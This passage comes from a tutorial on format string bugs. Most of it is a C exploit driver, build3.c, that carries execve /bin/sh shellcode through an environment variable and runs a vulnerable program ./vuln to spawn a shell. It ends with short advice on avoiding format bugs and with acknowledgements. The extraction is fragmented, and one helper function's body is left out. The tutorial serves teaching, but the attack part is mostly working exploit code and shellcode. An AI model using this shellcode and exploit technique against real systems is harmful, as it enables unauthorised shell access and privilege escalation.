also gives a shell, but passed through an environment
variable:
/* build3.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> char* build(unsigned int addr, unsigned int value, unsigned int where) { //Même fonction que dans build.c } int main(int argc, char **argv) { char **env; char **arg; unsigned char *buf; unsigned char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; if (argc == 3) { fprintf(stderr, "Calling %s ...\n", argv[0]); buf = build(strtoul(argv[1], NULL, 16), /* adresse */ &shellcode, atoi(argv[2])); /* offset */ fprintf(stderr, "%d\n", strlen(buf)); fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf)); printf("%s", buf); arg = (char **) malloc(sizeof(char *) * 3); arg[0]=argv[0]; arg[1]=buf; arg[2]=NULL; env = (char **) malloc(sizeof(char *) * 4); env[0]=&shellcode; env[1]=argv[1]; env[2]=argv[2]; env[3]=NULL; execve(argv[0],arg,env); } else if(argc==2) { fprintf(stderr, "Calling ./vuln ...\n"); fprintf(stderr, "sc = %p\n", environ[0]); buf = build(strtoul(environ[1], NULL, 16), /* adresse */ environ[0], atoi(environ[2])); /* offset */ fprintf(stderr, "%d\n", strlen(buf)); fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf)); printf("%s", buf); arg = (char **) malloc(sizeof(char *) * 3); arg[0]=argv[0]; arg[1]=buf; arg[2]=NULL; execve("./vuln",arg,environ); } return 0; }
Once again, since this environment is in the stack, we need to
take care not to modify the memory (i.e. changing the position
of the variables and arguments). The binary's name must
contain the same number of characters as the name of vulnerable
program vuln
.
Here, we choose to use the global variable extern char
**environ
to set the values we need:
environ[0]
: contains shellcode;environ[1]
: contains the address where we expect
to write;environ[2]
: contains the offset."%s"
when function such as
printf()
, syslog()
, ..., are called. If
you really can't avoid it, then you have to check the input given by the user
very carefully.
exec*()
trick),
his encouragements ... but also for his article on format bugs
which caused, in addition to our interest in the question,
intense cerebral agitation ;-)